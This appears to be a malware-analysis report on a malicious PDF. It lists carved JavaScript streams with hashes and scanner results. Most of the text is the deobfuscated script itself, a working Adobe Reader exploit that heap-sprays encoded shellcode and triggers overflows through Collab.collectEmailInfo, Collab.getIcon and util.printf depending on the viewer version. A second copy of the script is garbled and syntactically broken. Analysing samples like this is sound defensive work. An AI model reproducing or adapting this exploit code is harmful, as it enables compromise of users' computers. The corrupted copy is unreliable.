\| u 3 e \| u 5 0 4 9 \| u b 2 4 d \| 7 8 4 \| 6 2 0 b \| u e 6 1 f \| u a 1 8 0 \| b 7 d \| u 8 8 \| u f 4 3 1 \| 3 2 b \| u 6 5 9 3 \| 6 e 8 c \| u 2 5 e 5 \| u d f b f \| u f d 3 1 \| 9 1 d \| u c 0 b 6 \| u 7 f d \| u a 5 9 \| u c 3 c 2 \| u 7 c c 0 \| u 7 c c c \| \| u e 1 8 3 \| \| u 1 1 5 \| \| 9 4 4 \| u 6 5 2 d \| \| \| u 0 0 \| u 2 9 \| u 3 1 0 0 \| 0 d 4 4 \| 5 e f \| 7 7 5 \| u e 4 \| 0 7 \| 4 4 3 \| u 2 2 e f \| u 0 0 e 8 \| u 0 0 0 0 \| u b 8 \| d 8 3 \| c a 3 e \| u e f \| u 9 d 0 \| 8 7 b 8 \| d 1 0 b \| u 6 1 3 \| u b d 0 1 \| u f a \| 1 1 2 e \| u d 9 0 d \| 0 b c \| u a d \| u d 6 e 9 \| u 8 5 \| u c 9 8 1 \| u 7 c 2 2 \| c c 0 \| 0 0 d \| u 4 d 4 f \| u 2 3 3 7 \| u 1 0 4 1 \| b 3 0 9 \| 9 6 7 2 \| u 9 e e 0 \| u 3 a 6 8 \| u f 4 9 \| u 9 7 4 \| 0 5 3 2 \| 4 c c 8 \| 9 0 5 \| u e d 8 0 \| f 4 f 7 \| u 2 0 0 b \| u a 1 8 5 \| 0 1 \| u 2 f 0 4 \| u c 2 7 9 \| 4 9 4 \| u 0 1 f 8 \| u 4 e 5 8 \| u 9 1 6 \| \| u 2 5 f 4 \| u 4 b 0 e \| \| \| \| u 6 f 2 b \| u 7 d 5 2 \| \| 0 5 1 \| 4 e c \| 4 b c 5 \| e c \| u 4 b c \| u a 0 \| u c 2 \| u 3 8 \| u 1 d f 2 \| u 7 d 7 0 \| u 0 d d 7 \| u 9 7 e c \| u 1 c 4 3 \| 8 4 1 \| u 1 9 \| u 1 d 7 9 \| b c 5 \| u 8 7 e c \| u d e 4 9 \| u 1 1 3 b \| 8 c 0 9 \| 9 7 d \| 3 6 d 5 \| c 0 6 9 \| u 7 d 5 d \| u 9 8 \| 0 c 8 \| u 1 3 e \| u 1 1 5 f \| u 9 5 7 a \| u c f 6 \| 4 7 b c \| u 5 9 4 8 \| u b 4 c 4 \| u 4 2 \| 1 4 3 \| u e c 3 9 \| u 1 3 4 f \| a e 7 \| u c 6 f 0 \| u 9 0 a \| b e d \| u 5 3 5 f \| u 0 8 e 4 ' . s p l i t ( ' \| ' ) , 0 , { } ) )
`stream_026_off00008aca.js`	decompressed-pdf-stream	PDF FlateDecoded stream at offset 0x8ACA	9624 bytes
SHA-256: `102ffa70756d7dad59514bfd0dd3411367c0095993679b1acdd88d29969d1e5c`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 2 eval/decoder/string-building token(s).
`dean_edwards_stage_000.js`	deobfuscated-js	Dean Edwards unpacked JavaScript (decompressed) at offset 0x8ACA	8297 bytes
SHA-256: `6db484d533f7a1b50febd690e332656be412c0d79ad5746571702745d9705c17`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var ozHNAN9TI=new Array();var nmPVxSfr;function jjEHAgMd(tCvxYRoFa,rUnoegPcI){while(tCvxYRoFa.length2<rUnoegPcI){tCvxYRoFa+=tCvxYRoFa}tCvxYRoFa=tCvxYRoFa.substring(0,rUnoegPcI/2);return tCvxYRoFa}function hkf6uEkf(na3Wg2CI){if(na3Wg2CI==0){var pLiyxPeS=0x0c0c0c0c;var qRSJA8rM=new Array("%u9c60%u","00e8%u0","000%u5d00%","ued83","%ub80","7%udcc8%u","7f39%ue","4b9%u000","1%u31","00%u0","d44%u83","1a%u04e9%","uf775%ue","d34%u","1bf9%","ud9cb","%u7f09%","udcc8%","u7341%u9","c43%uf435%","uc0b8%uf4","94%ud490","%u76d","2%u9c43%u","f20d%ua","088%u","27b2%u34f4","%u7e18%u","dcc8%ue","ab4%udd8f","%u7f3","9%u23","9a%u76ac","%udcc9%uf2","39%u8e","5d%u7f3","8%u8e","c8%u8069","%udd5","d%u7f","38%u55c8%u","6ebc%udcc9","%uf239","%uc95","d%u7f38%u8","ec8%u9251","%udcc8%u8","039%ud","95d%u7f38%","u51c8%u7","aa5%udddd","%u7f39%","u6945%","u7ff3","%udcc8%u","c2b4%ud","c1f%u7f3","9%u15f9%","ufb95%ua","808%uf","73f%u","d7cc%","u9478%u54","3d%u743","d%udca2","%u7f53%u49","45%u7e2","c%udc","c8%u2","86b%udca2","%ueac6%u","ddd9%u7f39","%ud9a2%","ueab4","%udddd%u7f","39%u239a%u","72ac%udcc9","%u4f39%u7","208%u8","24c%ue34","8%u0a8","2%u41","0b%ubc58%u","b2a9%u","0a6a%ub9","ba%u067b%u","b9e6%","u1a41%u","b4c8%u0b","4d%ue6b","8%u501","6%ued","fa%u510a","%ueaf9%u5","10a%u","e5f0%","u4a17%","uf3fc","%u1655%","uf3aa","%u0f4c%ubd","ac%u1a","4d%ua","ce6%u","0f51%ub5f7","%u425d%ud","cfb%u7f","82%ud","cc8%u7f39%","udcc8%","u7f39%ud","cc8%u7f","39%udcc8","%u7e3","9%udcc9%u3","839%ua8a","d%u0d69%u","bfa7%","u1b78%u","aeac%u0c5c","%udcbb%u","1a7e%u88b","c%u125c%u","8cb8%u0","b58%u","9da0%u3339","%ubda7%","u335d","%ubea1%u1e","4b%ua5ba%","u7f78%u","b59f%u3a","57%ub9b","0%u7f5","a%ua973","%u134b%ub","3a5%u51","57%ub0ac%","u7f55%u8e9","d%u3b75%","uaba7%u135","7%ubda7%u2","b5d%u9aa7%","u1350%u9","dad%uf63","9%u275","5%u7f38%u","57c8%","u437a%u984","3%u073a%u","a845%u633","a%u6145%","u7ed6%u","dcc8%u7","c88%u","dd65%u","d4e1%u1","536%u87","4c%u71c9%","u7e28%u","dcc8%uc","2b4%udddd","%u7f39","%u6943%","u7eca","%udcc8%u","85b0%u25","41%ubf09%","ua966%uf","8c4%u","f507%","u4ec0%u","7113%u7c","6f%u2","74d%u","7f38%u","55c8%uf6","ff%u2","f00%uf69","f%ua8","09%u213f%u","0b41%u947","a%u8220%u9","ce8%u41cb","%u7ec","e%udcc8","%uc836","%u1dd3","%u7dda%u","41cb%u","7ed6%udcc","8%u7c","b2%u59cb%u","7ec2%","udcc8%uc2b","e%uddd9%","u7f39%u","5b63%u","6e84%udc","c9%uf","f39%u67f7","%udb4c%ud","c0b%u7","f39%udcc8","%u7f39","%udcc8%u","7f39%","udcc8%","u7f39%u","dcc8%","u7f39")}else if(na3Wg2CI==1){var pLiyxPeS=0x30303030;var qRSJA8rM=new Array("%u9c60%u","00e8%u000","0%u5d","00%ued83%","ub807%u","7d31%u648","0%ue4b9%u0","001%u31","00%u0d44%","u831a%u0","4e9%uf7","75%u4ccd%","u0040%","u7832%","u64b0%u7d3","1%u68f8","%u3db","a%uef8c%u","6141%u","ef2d%u75","69%u6d6b%","u3dba%ue9","b4%u0171%u","3c0b%u9","50d%u65","a3%u7d31%","uf10d%u","7c78%u6480","%u8263%u","6f15%u","7d30%ue9","80%u29a4%","u6481%","u2f31%u","9bd0%u7ea","4%u6481%u","f431%u","7705%","u7d30%ue","980%u6","aa4%u648","1%u2f31%","u8fe8%u7d3","1%u9b80%","u7aa4%u64","81%uf03","1%u61","1c%u7c26%u","6480%","uc8bc%u644","a%u7d31%u","d90d%u","7de8%u6480","%ub400%ue","02c%u0","9f1%ue","c86%u76","35%u8","fc1%uf5c4","%u6f84%u7","d5b%u6","4ea%ue8bc","%u6597%","u7d31","%u33d2%","u7d5b","%uf17f%u7c","22%u648","0%u785b%","uf10d%u","7c26%u648","0%u826","3%u6b15%u","7d30%u5","480%ud3f1%","u99f5%","u42b1%u11","3b%ue0f","2%ua7e1%","u1442%","u14ed%u","045d%u0dcc","%u185a%","u01ae","%u1849%","u0c80%u","0945%u","5ef0%","u521e%u55","b2%u530","2%u52b1","%u5302%","u5db8%","u481f%","u4bb4%u1","45d%u4b","e2%u0d44%u","05e4%u1","845%u14","ae%u0","d59%u0","dbf%u405","5%u64b4","%u7d8a%u64","80%u7d3","1%u64","80%u7d","31%u6480%u","7d31%u6480","%u7e31%","u6481%u","3a31%u1","0e5%u","0f61%u07e","f%u1970%","u16e4%u0","e54%u6","4f3%u","1876%u3","0f4%u1054","%u34f0%u","0950%u2","5e8%u31","31%u05ef%u","3155%u06e","9%u1c43%","u1df2","%u7d70%","u0dd7%u38","5f%u01f8%","u7d52%","u113b%u1","143%u0","bed%u535f","%u08e4","%u7d5d%u","36d5%u3","97d%u13e","f%u115f%u0","5ef%u29","55%u22ef","%u115","8%u25e5%","uf431%u9","91d%u","7d30%uef","80%u41","72%u200b%u","0532%u1","00d%u613","2%ud90d%u7","cc0%u6","480%u7e80","%u652d%","ud6e9%uad","7e%u85","44%uc981","%u7c22%u64","80%uc","0bc%u65","97%u7","d31%u","d10b%u7c","c4%u6480%u","87b8%u9d0","9%ubd01%u","112e%ufa","cc%u4d4f%u","4cc8%uc95","b%u7e","67%u9","905%u7d30","%ued80%u","f4f7%u974","8%uf49","7%u1041","%u2337%u","b309%u","9672%","u3a68%","u9ee0","%uf983%u7c","c8%u6480%u","ca3e%ua59","b%u7fd","2%uf983","%u7cc0%u","6480%u7e","ba%ue183%","u7ccc%u648","0%uc0b6","%u6593%","u7d31%ue","32b%u","6e8c%","u6481","%ufd31%","udfbf%ud","944%u6","443%u7","d31%u64","80%u7d3","1%u6480","%u7d31%u64","80%u7d31%u","6480")}else if(na3Wg2CI==2){var pLiyxPeS=0x0c0c0c0c;var qRSJA8rM=new Array("%u9c60","%u00e8","%u0000","%u5d00%ue","d83%ub8","07%u907","9%u4b","c4%ue4","b9%u00","01%u3100%u","0d44%","u831a","%u04e9%uf","775%ua185","%u2f04","%u957a%u4b","f4%u9","079%u","47bc%ud0","f2%uc","0c8%u","8c09%u","c069%u98","21%u42","2f%ud0","f2%uc6f0","%uec39%","u134f%u7","845%u4","ae7%u9079%","ude49%u91","30%u4bc4%","u6f2b%u4","051%u9078%","uc6c4%uc","4ec%u","4bc5%","uc279%ub","494%u93","ec%u4bc","5%u19","79%u5","841%u90","78%uc6c4%","u87ec%","u4bc5%uc2","79%ua0","ac%u9079%","ub4c4","%u97ec%u4","bc5%u1d79%","u4e58%u916","e%u4bc4","%u25f4","%u4b0e","%u9079%uf","649%u90a","0%u4bc4%","u5948%ucf6","8%ue4b9%","uc3c2%u9","b7d%ua085%","u188c%u40c","0%u90","13%u4ba","e%u05f4%","u4ad3","%u9079%","u1c96","%u9013%","ude3b","%u916a%","u4bc4","%u951","3%ude","49%u91","6e%u4","bc4%u6f2","b%u4451%","u9078%u7","bc4%u3eb","9%ub6b","1%uaff9%u","3e7f%u0d","ba%u88","a5%uf","c18%u","2ab3%u","e300%u3","290%uf50","9%u2eea%u","f501%u23","c4%ue","40d%u71b4","%ubf56%","u7af6%","ube4a%u7","df5%ube4a%","u72fc","%ua557%u","64f0%uf9","15%u64","a6%ue0","0c%u2a","a0%uf50d","%u3be","a%ue0","11%u22fb","%uad1d%","u4bf1%u","90c2%u","4bc4%u","9079%u4","bc4%u907","9%u4bc4%u9","079%u4","bc4%u9","379%u4bc5%","ud779%u","3fa1%ue2","29%u28ab","%uf438%","u39a0","%ue31c%","u4bb7","%uf53e%","u1fb0%","ufd1c%","u1bb4","%ue418","%u0aac","%udc79%u","2aab%ud","c1d%u29ad%","uf10b%u32","b6%u9","038%u22","93%ud517%u","2ebc%u90","1a%u3e7f%u","fc0b%","u24a9","%ube17%","u27a0%u9","015%u199","1%ud435%u3","cab%ufc","17%u2aab%","uc41d%u0d","ab%ufc1","0%u0a","a1%u1979%","ub659","%u9078","%uc0c4%u","ac3a%","u0f4f%u","e87a%","u3f49%u8","c7a%uf","649%u9188%","u4bc4%u","93c8%u4a69","%u3ba1%u","823a%u68","0c%ue6c","5%u916a%","u4bc4%u2d","f4%u4ad3","%u9079%u","fe4f%u","918c%u4bc4","%u6af","0%ub24d%","u5049%u3e","6a%u1","784%u","620b%","ua180%","ue61f","%u932f%u","b641%u9078","%uc2c","4%u19bf%ub","80c%u","19df%u3f0","5%uce7f%","u9c4d%u7","b3a%u","152c%u73","a8%ud6","c7%u9","180%u4","bc4%u277","6%u8a","df%u92","9a%ud","6c7%u9188%","u4bc4%u93","f2%uce","c7%u91","84%u4","bc4%u2d","fe%u4ad7%u","9079%uc","c6f%u83c4%","u4bc5%u1","079%uf","0fb%u","340c%","u4b07%u","9079%u","4bc4%u9079","%u4bc4%","u9079%u4","bc4%u9079","%u4bc4")}qRSJA8rM=unescape(qRSJA8rM.join(""));var aFGacqjc=0x400000;var hq2HyRLGr=qRSJA8rM.length2;var rUnoegPcI=aFGacqjc-(hq2HyRLGr+0x38);var tCvxYRoFa=unescape("%u9090%u9090");tCvxYRoFa=jjEHAgMd(tCvxYRoFa,rUnoegPcI);var sByZljZLw=(pLiyxPeS-0x400000)/aFGacqjc;for(var prAGIQ1SX=0;prAGIQ1SX<sByZljZLw;prAGIQ1SX++){ozHNAN9TI[prAGIQ1SX]=tCvxYRoFa+qRSJA8rM}}function i90crtyk(){var uS5H0H96u=0;var qjA67xDq=app.viewerVersion.toString();app.clearTimeOut(nmPVxSfr);if((qjA67xDq>=8&&qjA67xDq<8.102)\|\|qjA67xDq<7.1){hkf6uEkf(0);var nT5Cc8S3=unescape("%u0c0c%u0c0c");while(nT5Cc8S3.length<44952)nT5Cc8S3+=nT5Cc8S3;var lCz1FgTF=this;var tqhNsXLWE=Collab;lCz1FgTF.collabStore=tqhNsXLWE.collectEmailInfo({subj:"",msg:nT5Cc8S3})}if((qjA67xDq>=8.102&&qjA67xDq<8.104)\|\|(qjA67xDq>=9&&qjA67xDq<9.1)\|\|qjA67xDq<=7.101){try{if(app.doc.Collab.getIcon){hkf6uEkf(2);var hwninoB9f=unescape("%09");while(hwninoB9f.length<0x4000){hwninoB9f+=hwninoB9f}hwninoB9f="N."+hwninoB9f;var u0pZ9qZUGD=app;u0pZ9qZUGD.doc.Collab.getIcon(hwninoB9f);uS5H0H96u=1}else{uS5H0H96u=1}}catch(e){uS5H0H96u=1}if(uS5H0H96u==1){if(qjA67xDq==8.102\|\|qjA67xDq==7.1){hkf6uEkf(1);var yXLzxutRkA="12999999999999999999";for(kCJwDfNYH=0;kCJwDfNYH<276;kCJwDfNYH++){yXLzxutRkA+="8"}var avsgVHNb=util;avsgVHNb.printf("%45000f",yXLzxutRkA)}}}}app.bREO12OAt=i90crtyk;nmPVxSfr=app.setTimeOut("app.bREO12OAt()",10);
`dean_edwards_stage_001.js`	deobfuscated-js	Dean Edwards unpacked JavaScript (decompressed) at offset 0x8ACA	8205 bytes
SHA-256: `479149b3104ca8a4f0ee6516cd46a99e0e46cfcaf8e183b1070d70922725de32`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var ozHNAN9TI=new Array();var nmPVxSfr;function jjEHAgMd(tCvxYRoFa,rUnoegPcI){while(tCvxYRoFa.length2<rUnoegPcI){tCvxYRoFa+=tCvxYRoFa}tCvxYRoFa=tCvxYRoFa.substring(0,rUnoegPcI/2);return tCvxYRoFa}function hkf6uEkf(na3Wg2CI){if(na3Wg2CI=0){var pLiyxPeS.;var qRSJA8rM=new Array("%u9c60%u","00e8%u0","000%u5d00%","ued83","%ub80","7%udcc8%u","7f39%ue","4b9%u000","1%u31","00%u0","d44%u83","1a%u04e9%","uf775%ue","d34%u","1bf9%","ud9cb","%u7f09%","udcc8%","u7341%u9","c43%uf435%","uc0b8%uf4","94%ud490","%u76d","2%u9c43%u","f20d%ua","088%u","27b2%u34f4","%u7e18%u","dcc8%ue","ab4%udd8f","%u7f3","9%u23","9a%u76ac","%udcc9%uf2","39%u8e","5d%u7f3","8%u8e","c8%u8069","%udd5","d%u7f","38%u55c8%u","6ebc%udcc9","%uf239","%uc95","d%u7f38%u8","ec8%u9251","%udcc8%u8","039%ud","95d%u7f38%","u51c8%u7","aa5%udddd","%u7f39%","u6945%","u7ff3","%udcc8%u","c2b4%ud","c1f%u7f3","9%u15f9%","ufb95%ua","808%uf","73f%u","d7cc%","u9478%u54","3d%u743","d%udca2","%u7f53%u49","45%u7e2","c%udc","c8%u2","86b%udca2","%ueac6%u","ddd9%u7f39","%ud9a2%","ueab4","%udddd%u7f","39%u239a%u","72ac%udcc9","%u4f39%u7","208%u8","24c%ue34","8%u0a8","2%u41","0b%ubc58%u","b2a9%u","0a6a%ub9","ba%u067b%u","b9e6%","u1a41%u","b4c8%u0b","4d%ue6b","8%u501","6%ued","fa%u510a","%ueaf9%u5","10a%u","e5f0%","u4a17%","uf3fc","%u1655%","uf3aa","%u0f4c%ubd","ac%u1a","4d%ua","ce6%u","0f51%ub5f7","%u425d%ud","cfb%u7f","82%ud","cc8%u7f39%","udcc8%","u7f39%ud","cc8%u7f","39%udcc8","%u7e3","9%udcc9%u3","839%ua8a","d%u0d69%u","bfa7%","u1b78%u","aeac%u0c5c","%udcbb%u","1a7e%u88b","c%u125c%u","8cb8%u0","b58%u","9da0%u3339","%ubda7%","u335d","%ubea1%u1e","4b%ua5ba%","u7f78%u","b59f%u3a","57%ub9b","0%u7f5","a%ua973","%u134b%ub","3a5%u51","57%ub0ac%","u7f55%u8e9","d%u3b75%","uaba7%u135","7%ubda7%u2","b5d%u9aa7%","u1350%u9","dad%uf63","9%u275","5%u7f38%u","57c8%","u437a%u984","3%u073a%u","a845%u633","a%u6145%","u7ed6%u","dcc8%u7","c88%u","dd65%u","d4e1%u1","536%u87","4c%u71c9%","u7e28%u","dcc8%uc","2b4%udddd","%u7f39","%u6943%","u7eca","%udcc8%u","85b0%u25","41%ubf09%","ua966%uf","8c4%u","f507%","u4ec0%u","7113%u7c","6f%u2","74d%u","7f38%u","55c8%uf6","ff%u2","f00%uf69","f%ua8","09%u213f%u","0b41%u947","a%u8220%u9","ce8%u41cb","%u7ec","e%udcc8","%uc836","%u1dd3","%u7dda%u","41cb%u","7ed6%udcc","8%u7c","b2%u59cb%u","7ec2%","udcc8%uc2b","e%uddd9%","u7f39%u","5b63%u","6e84%udc","c9%uf","f39%u67f7","%udb4c%ud","c0b%u7","f39%udcc8","%u7f39","%udcc8%u","7f39%","udcc8%","u7f39%u","dcc8%","u7f39")}else if(na3Wg2CI=1){var U2;var qRSJA8rM=new Array("%u9c60%u","00e8%u000","0%u5d","00%ued83%","ub807%u","7d31%u648","0%ue4b9%u0","001%u31","00%u0d44%","u831a%u0","4e9%uf7","75%u4ccd%","u0040%","u7832%","u64b0%u7d3","1%u68f8","%u3db","a%uef8c%u","6141%u","ef2d%u75","69%u6d6b%","u3dba%ue9","b4%u0171%u","3c0b%u9","50d%u65","a3%u7d31%","uf10d%u","7c78%u6480","%u8263%u","6f15%u","7d30%ue9","80%u29a4%","u6481%","u2f31%u","9bd0%u7ea","4%u6481%u","f431%u","7705%","u7d30%ue","980%u6","aa4%u648","1%u2f31%","u8fe8%u7d3","1%u9b80%","u7aa4%u64","81%uf03","1%u61","1c%u7c26%u","6480%","uc8bc%u644","a%u7d31%u","d90d%u","7de8%u6480","%ub400%ue","02c%u0","9f1%ue","c86%u76","35%u8","fc1%uf5c4","%u6f84%u7","d5b%u6","4ea%ue8bc","%u6597%","u7d31","%u33d2%","u7d5b","%uf17f%u7c","22%u648","0%u785b%","uf10d%u","7c26%u648","0%u826","3%u6b15%u","7d30%u5","480%ud3f1%","u99f5%","u42b1%u11","3b%ue0f","2%ua7e1%","u1442%","u14ed%u","045d%u0dcc","%u185a%","u01ae","%u1849%","u0c80%u","0945%u","5ef0%","u521e%u55","b2%u530","2%u52b1","%u5302%","u5db8%","u481f%","u4bb4%u1","45d%u4b","e2%u0d44%u","05e4%u1","845%u14","ae%u0","d59%u0","dbf%u405","5%u64b4","%u7d8a%u64","80%u7d3","1%u64","80%u7d","31%u6480%u","7d31%u6480","%u7e31%","u6481%u","3a31%u1","0e5%u","0f61%u07e","f%u1970%","u16e4%u0","e54%u6","4f3%u","1876%u3","0f4%u1054","%u34f0%u","0950%u2","5e8%u31","31%u05ef%u","3155%u06e","9%u1c43%","u1df2","%u7d70%","u0dd7%u38","5f%u01f8%","u7d52%","u113b%u1","143%u0","bed%u535f","%u08e4","%u7d5d%u","36d5%u3","97d%u13e","f%u115f%u0","5ef%u29","55%u22ef","%u115","8%u25e5%","uf431%u9","91d%u","7d30%uef","80%u41","72%u200b%u","0532%u1","00d%u613","2%ud90d%u7","cc0%u6","480%u7e80","%u652d%","ud6e9%uad","7e%u85","44%uc981","%u7c22%u64","80%uc","0bc%u65","97%u7","d31%u","d10b%u7c","c4%u6480%u","87b8%u9d0","9%ubd01%u","112e%ufa","cc%u4d4f%u","4cc8%uc95","b%u7e","67%u9","905%u7d30","%ued80%u","f4f7%u974","8%uf49","7%u1041","%u2337%u","b309%u","9672%","u3a68%","u9ee0","%uf983%u7c","c8%u6480%u","ca3e%ua59","b%u7fd","2%uf983","%u7cc0%u","6480%u7e","ba%ue183%","u7ccc%u648","0%uc0b6","%u6593%","u7d31%ue","32b%u","6e8c%","u6481","%ufd31%","udfbf%ud","944%u6","443%u7","d31%u64","80%u7d3","1%u6480","%u7d31%u64","80%u7d31%u","6480")}else if(na3Wg2CI=2){var pLiyxPeS.;var qRSJA8rM=new Array("%u9c60","%u00e8","%u0000","%u5d00%ue","d83%ub8","07%u907","9%u4b","c4%ue4","b9%u00","01%u3100%u","0d44%","u831a","%u04e9%uf","775%ua185","%u2f04","%u957a%u4b","f4%u9","079%u","47bc%ud0","f2%uc","0c8%u","8c09%u","c069%u98","21%u42","2f%ud0","f2%uc6f0","%uec39%","u134f%u7","845%u4","ae7%u9079%","ude49%u91","30%u4bc4%","u6f2b%u4","051%u9078%","uc6c4%uc","4ec%u","4bc5%","uc279%ub","494%u93","ec%u4bc","5%u19","79%u5","841%u90","78%uc6c4%","u87ec%","u4bc5%uc2","79%ua0","ac%u9079%","ub4c4","%u97ec%u4","bc5%u1d79%","u4e58%u916","e%u4bc4","%u25f4","%u4b0e","%u9079%uf","649%u90a","0%u4bc4%","u5948%ucf6","8%ue4b9%","uc3c2%u9","b7d%ua085%","u188c%u40c","0%u90","13%u4ba","e%u05f4%","u4ad3","%u9079%","u1c96","%u9013%","ude3b","%u916a%","u4bc4","%u951","3%ude","49%u91","6e%u4","bc4%u6f2","b%u4451%","u9078%u7","bc4%u3eb","9%ub6b","1%uaff9%u","3e7f%u0d","ba%u88","a5%uf","c18%u","2ab3%u","e300%u3","290%uf50","9%u2eea%u","f501%u23","c4%ue","40d%u71b4","%ubf56%","u7af6%","ube4a%u7","df5%ube4a%","u72fc","%ua557%u","64f0%uf9","15%u64","a6%ue0","0c%u2a","a0%uf50d","%u3be","a%ue0","11%u22fb","%uad1d%","u4bf1%u","90c2%u","4bc4%u","9079%u4","bc4%u907","9%u4bc4%u9","079%u4","bc4%u9","379%u4bc5%","ud779%u","3fa1%ue2","29%u28ab","%uf438%","u39a0","%ue31c%","u4bb7","%uf53e%","u1fb0%","ufd1c%","u1bb4","%ue418","%u0aac","%udc79%u","2aab%ud","c1d%u29ad%","uf10b%u32","b6%u9","038%u22","93%ud517%u","2ebc%u90","1a%u3e7f%u","fc0b%","u24a9","%ube17%","u27a0%u9","015%u199","1%ud435%u3","cab%ufc","17%u2aab%","uc41d%u0d","ab%ufc1","0%u0a","a1%u1979%","ub659","%u9078","%uc0c4%u","ac3a%","u0f4f%u","e87a%","u3f49%u8","c7a%uf","649%u9188%","u4bc4%u","93c8%u4a69","%u3ba1%u","823a%u68","0c%ue6c","5%u916a%","u4bc4%u2d","f4%u4ad3","%u9079%u","fe4f%u","918c%u4bc4","%u6af","0%ub24d%","u5049%u3e","6a%u1","784%u","620b%","ua180%","ue61f","%u932f%u","b641%u9078","%uc2c","4%u19bf%ub","80c%u","19df%u3f0","5%uce7f%","u9c4d%u7","b3a%u","152c%u73","a8%ud6","c7%u9","180%u4","bc4%u277","6%u8a","df%u92","9a%ud","6c7%u9188%","u4bc4%u93","f2%uce","c7%u91","84%u4","bc4%u2d","fe%u4ad7%u","9079%uc","c6f%u83c4%","u4bc5%u1","079%uf","0fb%u","340c%","u4b07%u","9079%u","4bc4%u9079","%u4bc4%","u9079%u4","bc4%u9079","%u4bc4")}qRSJA8rM (qRSJA8rM.join(""));var aFGacqjc=0x400000;var hq2HyRLGr=qRSJA8rM.length2;var rUnoegPcI -(hq2HyRLGr+0x38);var tCvxYRoFa ("%u9090%u9090");tCvxYRoFa=jjEHAgMd(tCvxYRoFa,rUnoegPcI);var sByZljZLw=(pLiyxPeS-0x400000)/aFGacqjc;for(var prAGIQ1SX=0;prAGIQ1SX<sByZljZLw;prAGIQ1SX++){ozHNAN9TI[prAGIQ1SX]=tCvxYRoFa+qRSJA8rM}}function i90crtyk(){var uS5H0H96u=0;var qjA67xDq=app.viewerVersion.toString();app.clearTimeOut(nmPVxSfr);if((qjA67xDq>=8&&qjA67xDq<8.102)\|\|qjA67xDq<7.1){hkf6uEkf(0);var nT5Cc8S3 ("%u0c0c%u0c0c");while(nT5Cc8S3.length<44952)nT5Cc8S3+=nT5Cc8S3;var lCz1FgTF=this;var tqhNsXLWE=Collab;lCz1FgTF.collabStore-.collectEmailInfo({subj:"",msg:nT5Cc8S3})}if((qjA67xDq>=8.102&&qjA67xDq<8.104)\|\|(qjA67xDq>=9&&qjA67xDq<9.1)\|\|qjA67xDq<=7.101){try{if(app.doc.Collab.getIcon){hkf6uEkf(2);var hwninoB9f ("%09");while(hwninoB9f.length<0x4000){hwninoB9f+=hwninoB9f}hwninoB9f="N."+hwninoB9f;var u0pZ9qZUGD=app;u0pZ9qZUGD.doc.Collab.getIcon(hwninoB9f);uS5H0H96u=1}else{uS5H0H96u=1}}catch(e){uS5H0H96u=1}if(uS5H0H96u=1){if(qjA67xDq=8.102\|\|qjA67xDq=7.1){hkf6uEkf(1);var yXLzxutRkA="12999999999999999999";for(kCJwDfNYH=0;kCJwDfNYH<276;kCJwDfNYH++){yXLzxutRkA+="8"}var avsgVHNb=util;avsgVHNb.printf("%45000f",yXLzxutRkA)}}}}app.bREO12OAt=i90crtyk;nmPVxSfr=app.setTimeOut("app.bREO12OAt()",10);

Open this report in the interactive analyzer, or submit your own file for analysis.